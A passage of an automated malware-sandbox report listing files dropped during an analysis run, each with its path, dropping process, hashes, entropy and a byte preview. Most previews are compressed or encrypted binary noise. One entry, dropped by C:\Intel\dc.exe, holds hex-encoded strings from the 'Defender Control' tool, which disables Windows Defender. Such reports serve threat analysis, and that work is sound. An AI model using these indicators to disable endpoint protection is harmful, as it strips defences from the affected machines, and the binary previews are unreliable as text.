                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_638004170464094982

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\aae27d8c-0c0e-4371-928a-b2d2faa2a2fa.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):9758
                                                                                                                                                                  Entropy (8bit):5.310842675262572
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:uhoCL/Pgu90RZj8Sr6FA4ZiIxuERzA83h09RZxAexumhLtoDU9o66XLmb:q9iIxuERzA83h09RZxDcgyLe
                                                                                                                                                                  MD5:46B3AAAA736C1474C8E2A5D977390097
                                                                                                                                                                  SHA1:ABB657981CF77DB0775C66561CE77C4005241D3E
                                                                                                                                                                  SHA-256:80249DFCD532B8A2436FA1D25CF35754D93CDB5039DB3A42CA7A003477E52684
                                                                                                                                                                  SHA-512:941EB37510B9D01B81B6F4C70510AEACE133491B3B55786AFB080C19E0A5D70807C526CB6CF2EF22FAC54889BE3DA959CBA08A691BD8EF58B9F3E2BCC41BCCF8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"94.0.992.31","browser_version_of_last_seen_whats_new":"94.0.992.31","last_redirect_origin":"","last_seen_whats_new_page_version":"94.0.992.31","last_whats_new_version":94},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExpo

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\aed10d41-8eda-4a32-ac42-9688e8164ef3.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12335
                                                                                                                                                                  Entropy (8bit):5.5568299510314905
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:q9iIxuERzA83h09RZxD5g53h2XgZrK8GCn:pIxuERzA83h09RZx+BAQ0a
                                                                                                                                                                  MD5:DC9DE0C383C1D5A09606C037E9F94ABB
                                                                                                                                                                  SHA1:CCCF0553A2E94F7275F81C75A35ACEC4D2E0FC45
                                                                                                                                                                  SHA-256:E769976372EF113619772FB796A558578E5DFFA2B03AF96F75EB90B821F4DC72
                                                                                                                                                                  SHA-512:21542C202716BE07E49317A25A1AD05EAC5801D01E9540EDC17365EE52C07892694E8A7306BDE2584ABB50983E95738F599CC959EDEBBCC602F140DD2D2C93B5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"94.0.992.31","browser_version_of_last_seen_whats_new":"94.0.992.31","last_redirect_origin":"","last_seen_whats_new_page_version":"94.0.992.31","last_whats_new_version":94},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExpo

                                                                                                                                                                  C:\Windows\Temp\.ses

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):53
                                                                                                                                                                  Entropy (8bit):3.9116060676482856
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LcdRScx+4VmIY6AZA:IxPdQA
                                                                                                                                                                  MD5:DCC7FB629D5D29B51AC43E75B64A4B41
                                                                                                                                                                  SHA1:2E4157245FE9871880A731DA5AD43A4825860663
                                                                                                                                                                  SHA-256:8FA11471BEE5A9FC7BA4A3156163A05C41DD9AE26063C11EF9D9089D02768CFB
                                                                                                                                                                  SHA-512:04AEC2F49BF4AF484745F0B165A92A87D6619CB6BD821AA523A0BC11D3396E1F3AC2E5A201F274DF0896DA0EA15843B77CE658D5D452C2AB03AAA9099F674D12
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:1736578471081..3544C499-484C-48BA-AAE2-6D11129927A4..

                                                                                                                                                                  C:\Windows\Temp\680f757a-b1e9-47a8-9921-6a3a1e104627.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 43805
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28748
                                                                                                                                                                  Entropy (8bit):7.9918576871001425
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:384:SU7ZPeF1W3JgUrqaO/8dOcbwy59NjS5BMYGYycIfPhrVx2NtsEeSeFzVXe/rxd:H7peFkZL9RZSz3gnhhGcpXetd
                                                                                                                                                                  MD5:2A37AD0EC191D53104BB46953AC6C43C
                                                                                                                                                                  SHA1:FD23FFC5B7E4A6B45FBD88A486D15FAA51DC07AE
                                                                                                                                                                  SHA-256:51F075EB69486CB23B32A0776782B4A1B2AF204429AB94510469E02B115E56CC
                                                                                                                                                                  SHA-512:AEB91CB7902A800D7B0C43627EC2B52121BC41BA29A1B6ABEDBFCFA4802254A0594ED239EA7A3F8D40241E43D436428D1E4AC117BD97269D78460F82F9BDCF68
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...........Zms.6..._..p..[.(.b[...M....N{..t ...S.......v...H.q.g:....]...p..6I8_d...C.\p.X$.2.p.g.8I}8.".D)$<..O...}.J9.3..a.i.'...x.....5O...x......I.M.!.'\.l.2.0.cN.fq....\......7..,......>.p...w&.KS.......(O.V>......O.r..V~J.`....U(..Y..MIy..w..g0e......D.,L..y..N.+..._....O.h.]...V....r................O.|.:....Li..>COy......N.h.......R....Q%.,Xr.y...G8=.A....!8(..L....c....sA....t.Vl:...v...G;...^.l...#.t.>...k..d..kr...B......Pb.0*..!..;9.....:~....j;....j.*O..!B......?....^.]....;...[.g.B...%..'.7;.9.>..gP. p8...:.5l.Y.....Jp..R,.?..b..8O......h.X(..G.).Cz.C..%....x.ET.....AEi.../..0.. ....k.*t...wl..e...H.i.F.....?.....z...?..........(../.O..R.?.4..7...j ..Q.....l..ob!..A..j...@..!).....K...MW.U.N.......W..Bh'8.'.y....Y.[o...PI..W.*...i...r.e..=.k^.WC..Uy.j..687^.z.#u5.4O...........-j.j3..L.1..F...8.......@l.9.c.aGC.R.&..j.Q-av?...[4.E..T8....u..+9.<.n.Qw.D..N..S..3.D...... .%C.j.7.Y.s(.0wq.ZI.#''#..[K.GJ ....4.....?

                                                                                                                                                                  C:\Windows\Temp\7128e338-ed86-483a-81a1-dfe8e293ee8d.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 12587
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3280
                                                                                                                                                                  Entropy (8bit):7.938673637935802
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:sqkKZz8Yel0T0Lep/NRoRl18zr9eAberZq:z0l0T0LvYr9Fbe1q
                                                                                                                                                                  MD5:D1C42E18C3C565B93F63D1D3BD5354A4
                                                                                                                                                                  SHA1:F70CFDCE1FD8DB93B7E4FA89FAE1D42F64516338
                                                                                                                                                                  SHA-256:2E647EE00104BE49B63358AD01DA9D70AA32E36D56329663442B023B88806458
                                                                                                                                                                  SHA-512:6522273071CB7F51EA7E8A86206814B4C9EFDD2F699DA5BF469062448E8E31C84D7567AA7F0AF7FB3E550238C8BB830555099EA2B97DB35469AEB807DBB7C685
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...........Zmo.6..._.-..i.r...h.\....h.,b......ms#..H%...7....%.d....-K.pf8....j.._,.6.I...wo.hFIg..9K...O.G.QD. A.*h.@Co..Nnv.......D..d.._2..O......3&..i.P....;..4.iH.K.a.......4.ir.K..1.S.4.i....}J....`.#..Qoo...{.[.\.(y....&..N.c!....y..=kw~....t.?.]..p..].S.....g.....].....N.|...x..X.w...Y....k.t..{dq.../.<.}....DY......m.v..A..n....G...'.qD_...z.?.x7...}..%.{d.1.r!.[.).......[...........x...7_..L./..wG?....r..\.[...J.......2......n.~X4.x!>.<.._.....L..1|....VQ......Sb....-k.m...~.......vx.....}.E........KP.j.....,-...HN.4...(Ic.gJI.+...rNi8.....w.0.....^%....J..B".~.k..l.k.A.Y`..!..v.....a...W.1q&F..$...D&g.6`..!..X.0P...?..., ./}".4`.. 1..nv=E0.ph....?..C.fQ.w.N..C5XO$.+.......X....\mW...'Mw.}..(.<..*..r....Y8.....q7.....P?\v.$8/.a..LT.W..HPg.../.(x..v.j..F..nXD.A...5.)i.g..<.@.q_...._.......F.8.q..`B.L...Qj@.....B>.......N....>......P.9R.....).E......i6!..].!......][9......."..<..R.G_.t,....q....3..|Auf(..'T.IL.|N........gz...l.#.z.

                                                                                                                                                                  C:\Windows\Temp\89f7f9fc-258e-4f74-aed9-5f47d3abcb35.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 981644
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):238985
                                                                                                                                                                  Entropy (8bit):7.9982970462170595
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:6144:PswrfZ/Mb6NjE7lzl4mC2zAWPo4GIs4RU4afLP62H2bCuzs/9u:PrLBqZzl82zzPStVT626S9u
                                                                                                                                                                  MD5:F6B8BAAC3BBC33B052A0C5465E82FA14
                                                                                                                                                                  SHA1:CDAA5FB23B39E27554C78E8A8E9F8842543C1FBE
                                                                                                                                                                  SHA-256:310919D96F428159AEDB25891DF1F384B64E3C4B81BEAB7FE8E8ED923DDF3979
                                                                                                                                                                  SHA-512:E6CFE3119576769ECC2F09C62B1E10DB429525FD96F4967824E42E92DFC0B23E3EC5D2D7360DC98C7B1024FF6E4A6FEA2F07F469973B7F13D850582C897C2ED5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...........<.s.....8;...).r....$..4.sb.)73..G.D".....V-..o?..w.(.n.i;.P$p......t*...e.-W....x.p..8Y)q...u..aS..J..0....RZU.*..L..V.<..*.B.M.(.....sY^..P.X\.)..?...e.D.%..i.J."..X(.tV6E*...+........,W.;....W..F..L.}..TQ.(.j&t]e.r".,...Y/Tu}-.O...yV.{i.."W{.zS...%.r.BVw...Z.<~..Z..z.+=.e}VV....\..D.._TR.MUnTU_N..\.A4.n6...cq...&.8...+q..I..E........!F......#@J.@.>.}.u...-J0.I.R@..h.H^d)...i..\..j........OC...+%.K...5....Z..n.......2@...&W3.uO.8.'...s>.o......'...}...\..|f...cd.RvK..q....3.........o.>........t......e.....@.h.Tq......10.'|;S.*.XuI.4.;n.o..i...jl..T......=I.E."....(.I.....m>.<..Q<...D.@".d...:{A'..=...A.*..J|........z....x..+Dvf.t....0...+...cs.Z..Xp.8>f;.N.iN.....w..@u...Y..,.J.8..%...R.q.1$i't...c7_..@.......a.....!...A...'.0.........yc..._......2O.....[.->7C....i0.v5q.M.!.*dA@.(...y F..r......Rv.#.[..r[>p..-s.vc....9.,@...<....I`._..I.mZ..'.. ..r.R..g...[U.%0.....a..|.;......[.]=X...,...~m@O...8....<...A."....Y./....i..p....O

                                                                                                                                                                  C:\Windows\Temp\autB0DC.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\dc.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33220
                                                                                                                                                                  Entropy (8bit):7.730918275075489
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:ucjZIYG6A8kiHIgH82NNkIY6zAXohupeNISgTBuda:ul8kpg9NW6vhupUISgoda
                                                                                                                                                                  MD5:7F08F61D0CB3BDEF38867217FD81B787
                                                                                                                                                                  SHA1:1F487054BD6D22A1FBD3A5AAD610B2897D389D2F
                                                                                                                                                                  SHA-256:145D1A291D7962F9C4D2A4FC0323CD1357EFB26F8030E580762DB55022D7BF84
                                                                                                                                                                  SHA-512:6E4A84D4BD2D1E52CBB197FF6E04A81C6634D03860522B13D3D8B1B4C90CAB139667AEF4ACCB41480434434F8BA247C3064C252388012A3052DCD7E7D4A98A39
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.p.%.....Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.:..qA..f.y..i9... ....VMf.i..k3.M..<..Lf....g6........F...9...A....o6.....`...|'..@....Q@...q7...bg1.Qf`... f....S7.L.....mE.....4..M...eD..& ......~&S...o9..&Sj..k6..(`...@.....g4...-...gA.M..>...o6.(...K3)..g1..fT@..e3..<ji0.....L.6...i..`.9.....0N@Y...h.9..Wb.4.........F.j.S..`....&si....../.#..Br....h...).....a2... ?..p.tQ..`..n.-.. .(....`#l...;H.@....@..m9..@.8.pL......`...S....(...'......... .......4.o7...|3Y.....2(.9..e5...|.....}M..>..`....&.I...2.`h`U...d.k..B&.......8.... .S...f.P...n...&|.V...f.`..i8.P.. .wfsP3..9 ._..t....p..mD.M........|..l.h.8..nb.|....?........ .....................`0......nh.@&.;3z..2....*.w..$..Q.&..#6.P..... .....3.......D...6..& ..%.1..&..Z..&3`........i6..f.@...@..5.......I. ..5....3`...k@k^...`" . ..`|..X..'.....k@pD..{.T.........`.T.. l_.3..I.....e...........1.a.....@4............i5..&.@...S....... ...^........O 7...AD .l... .......W........|.L.....<NAk.....`..@...f......../....(... Y.

                                                                                                                                                                  C:\Windows\Temp\c3ce1781-6377-4239-bbc1-10b7e93b0684.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 16707
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4015
                                                                                                                                                                  Entropy (8bit):7.942829486244974
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:6qO65dFso15wMvxpjQsGOm04jp7VFt5luSMa7AAlUzb37:XH5ko1qMgcm0kV5dMdVzb37
                                                                                                                                                                  MD5:157FA9B3914DCEF8DADF132F7C41682B
                                                                                                                                                                  SHA1:4BF449A8772CA6591FECD5F85FF6230E68D1D0D2
                                                                                                                                                                  SHA-256:0D0594A2FD1B90F179081B6261FEB6D113C99C81A854BC7418D7AFB935AF2F46
                                                                                                                                                                  SHA-512:36445F35CE2D1756E56397A51D791D7C2B03C2D858A3E9A3385AF6DF9D1F664D8F21E11F5B71ABC399DB914CA2B947713A722E068269AA0B0FEE80A23EC44985
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...........[ms...~..w."..i_:.t.q:.L...G/.\....!.1E..iGM..x#........;IX,..........v.....y.#t./3B.*..-..<&..zI.8.E..8{.....4G.`.c0...Ct........NO......&a.".._..$.S...LR..]..1...;.Xp8.p...).S.......s9...&..GWA.].NXD19.l.}I0..MJ.w.../6.hI"...d[.w..v4......h2.......j.]...Q......|..~?.8..<.&@.u)ip5..f..t0....{...h.L.....Q.s....\.x..i>......t...M..{.*Z>.......f0..*^_W....ljS..O..),{.R..u..u.F....4........0.....K.+.&$.(.1."..x}"Y..I.Fa.C.#N.N..|.H..'..d...r.nQ.A..i.c.'.R....1Y..........1.=..'.[.._s.....`G`i.70+...X.$.!.oB.l..`m..|ec.bL.R4.r...E.|(I.,#Y.dtY.V8.....@.1..q..q..qO.0.....j.[).e..M.}..&i.....n..{....|:...2.5-q..IXi..U_...."K.....P.j.e0..<.p$..3..>...o...4......;Och...x...FY.......E...`A..5.."..\P..o....&a......op..>.d.3.HWh..'.=.....m.K....V.....4..U.3...a.....y..0]b..-..va..P......wd.;..t.1SgV.s.>...V.J.JE..S...+.H.I..lq.E.!....B...-.K.B..._.....X......0..z..V,...8rt.{.."K.g5....-@..*.0-.....w.....)......4+v..P=...-.>.....>R.....Z.A`.......

                                                                                                                                                                  C:\Windows\Temp\fc65f6fd-839f-417d-b540-ddbe30f77212.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 769766
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1653407
                                                                                                                                                                  Entropy (8bit):7.9952777576561385
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:49152:m8Okx3c/QzPWPWsCDADjukiywfpz3yblIyP+/0M64U:gkRYouPWrADj9irpzUqrU
                                                                                                                                                                  MD5:03C04B04F5E2CE562F63DF14B1784F81
                                                                                                                                                                  SHA1:6EAAF3B995937EBA72752F7DBD6D1F22926C0D83
                                                                                                                                                                  SHA-256:79B1D86EC710D64CEE57DFB44792C2759E9F24D0FDBAFC15D929BFEF0305AF93
                                                                                                                                                                  SHA-512:B28C36BE45942074B061B626E5E8DD9F177F034BB2963D3411B79370CD0F1F59267CF788F07A79D4E3BE82260825CEB18A2A23869E93A0BDEEE220E2DDA9BC09
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...........}k{.6.._..=>..b$;W*...q.w.$...].M..."U......\.R..t....$....s.pm4.c.....8..w*Q..p..Q....|.q..,.....#7.J.fe...q.W.J'E<..\.c.%.9./..6...:I$.n.......>...U.t..gp..=H}~.c.{..7s..r{.8./.w.%/w.......?..q.`.b.;.a.....b.9.a....J..N....F..x....e.n......q$.1.jiG.i......6..0...(..[.ChF.K...,G..C=..3c.g_v.l..a...e..,....P|;?.N.......0]_w.?...~.Y..J<.....w.~....c..'.eq..f.....$..7....../f.J.n..0....n9..{.......N.......p.....@....D\!....Y.+...fy.Gi.z.4......}..:[s..K.>@..v.Q2....".....).k....dO.B.q..r...P...r..f.p.A.v..'q]....1.U.y4...`..r..v....[.u...yo.....m..Xt.....r..*...~.GS5.2.@.......]...3a.*.u...5g..^>,...a.P..4.J.i....p:.. .n.f.D....JD*_=.Y.=...R_>C..v.L..x.{5m.\=.5w....}{.&.|.>.)~\.H...|..V...-.yy..|7...B..!...b..9./.i.....*mBi..m..>.".......M.|...Y!.'....),U.5G#..h%8....qZ.C....t.._a.2......f.e.aL..'..7%........Z.s)...f...v.F@J(.j.s..E.}x......N.../y%.:.$..........D../r~M=..Fy..(.OB......d..%.....I...O.4J ..V<-.4..IQ.pb.b..^..-.O38.

                                                                                                                                                                  C:\Windows\Temp\fefeec47-33b2-4da6-91f6-dfbe15983ff6.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 12280
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3110
                                                                                                                                                                  Entropy (8bit):7.933903341619943
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:0MWjN1CDThRYxENcEvyGF/8WAr6Fv9MFghzqSl:0MWjN1gRYavR8WjMFQzqSl
                                                                                                                                                                  MD5:A83A2746B84F1CF573B02965B72ED592
                                                                                                                                                                  SHA1:85CC572D6F90029EB99AAFA56297D1BCA494313A
                                                                                                                                                                  SHA-256:DF4B53C1C7C48E80753D4945E6EC7847084F51BF57F0ED9D341326C74651D6EC
                                                                                                                                                                  SHA-512:C287F479EF572A06FF191C4E9A8A718507C97A2A45CB265D7DC65DD7922B80D36CE7660EC5D7EA9F3D1F1EF71C51C3E4F3D7973754F97A89B4F14D1B1FDE70DE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ko.7......J...../..v....... ....zE.\+.T..f..%wW.$........p8/.....z..|a...}.#y.`.l..7Kr..T:'.UE,.&.i..Y............h...B.....gJ....%.\.?.f]1R..@3.jHA..eHi&.Q..`....g.__?'3^...@~X..a8............UN..%...&.F..K19".Y:.).L.L..WL..xxD>.P@ ...&'..j..)%.Q\..<!.3n.<#....;.gd2.LZ....x.m&.e.`&;.KX..."...<G....8.R.jsd....g.)..?.$=UVT...#.+g.!.......R..1..#D.k...3.Bj3iT.....*.M..L....}..S.K.....zi..n.A{......n..o.0j..q...w...3.7.N..].>...zK..sr1#.d..Tk..ckB...<....j.a.M1oe.9.jIQ.y+...6.....]....v.X.......q.....a>...2`.WV.v.'..~.3*.4.'8...hkT.H..9SOIF.%...;n.6.U....i!...2v.9/.;.....R..8.(..L.b....aY2ps% ."...x.V..Y[.h.....^.........U.....p.'.&m.....6..%pWE....:..o.k...<.....5....j.I...*9...f..3.....-..0..D;......*S.td/...........^_.v.)y ..Uf..q>.v2...0....o....Y%5;.5fn..{.......p_......B..V.......D.Y.l....q 3...sm.b..!..E....a. &.w.-.s..>..M_...`.0..k.!<SH...9$.....V.\A$..}..8....#`...,...3.W..k...\..xH.1).~.Y.L1.O...\.....k.....s..i+.....).0

                                                                                                                                                                  C:\Windows\Temp\ihqcxco

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\dc.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):111542
                                                                                                                                                                  Entropy (8bit):3.429028761339644
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:W62wUDwXu72ncwnSI6MMKWEFcwE66CpHNc+L5BLjZhvDyR4V7rS8uo:W62wUDwXNncwnSI6MMK3cmQ4HDZSJo
                                                                                                                                                                  MD5:D1A0850A8B128575034B94F0BD05318B
                                                                                                                                                                  SHA1:2064B00E81B2D0AFA60D561CCCA2D2C82D9C8414
                                                                                                                                                                  SHA-256:C40566AA7677F27F3A633FFD1A98F80FC60EB0B5B1487B756850504E5B462501
                                                                                                                                                                  SHA-512:64A1587E6E6FDB6AAC284D8C5A395385BE9605DB391C718CAF0F5F78359A8627D486C9CA6FDD1A253F0F26321FD76695B6EAC44662F87F4AC69D2873CCC679E5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:4D7573744465636C61726556617273[08AEi4755495F52554E4445464D5347[08AEi47554944617461536570617261746F7243686172[08AEi57696E44657465637448696464656E54657874[08AEi312E37[08AEi446566656E64657220436F6E74726F6C[08AEi202D20417574686F7220627920426C75654C696665[08AEi5B434C4153533A64436F6E74726F6C3A76[08AEi5D[08AEi323031352D32303231[08AEi2040557365724E616D6520[08AEi2040436F6D70696C656420[08AEi20404175746F497445786520[08AEi20404F534172636820[08AEi20404175746F497458363420[08AEi20404F5356657273696F6E20[08AEi57696E446566656E64[08AEi546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321[08AEi546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321[08AEi204053637269707444697220[08AEi204057696E646F777344697220[08AEi53797374656D33325C[08AEi2040576F726B696E6744697220[08AEi6B65726E656C33322E646C6C[08AEi7573657233322E646C6C[08AEi61647661706933322E646C6C[08AEi7368656C6C33322E646C6C[08AEi6F6C6533322E646C6C[08A

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                  Entropy (8bit):4.640155433808841
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7Y:fwUQC5VwBIiElEd2K57P7Y
                                                                                                                                                                  MD5:837404F06A30C16EEA2E533893485018
                                                                                                                                                                  SHA1:202AFC7B20C0F0F68E0454958E3D10962C5D7B6C
                                                                                                                                                                  SHA-256:2CC9F07BADD952512A931D682D88F86B3546DFB75B7BB62AD7F4C64155647178
                                                                                                                                                                  SHA-512:292B60D13E446E114A22888863E382CED131E4E1824A1D2B6C71589409255C03E5A676CEBEB4224366599C3DD957A29E55736C1DE64DF7E25CEF45D3F9DC661D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

